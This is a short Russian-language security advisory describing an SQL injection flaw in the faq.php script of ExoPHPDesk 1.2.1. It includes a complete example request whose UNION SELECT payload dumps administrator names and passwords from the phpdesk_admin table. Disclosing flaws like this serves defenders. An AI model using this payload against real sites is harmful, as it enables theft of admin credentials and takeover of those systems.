Программа: ExoPHPDesk 1.2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «action» сценарием faq.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
//faq.php?action=&type=view&s=&id=-1'%20union%20select%200,
concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109), char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),
char(97),char(115),char(115),char(119),char(111),char(114),char(100), char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/*
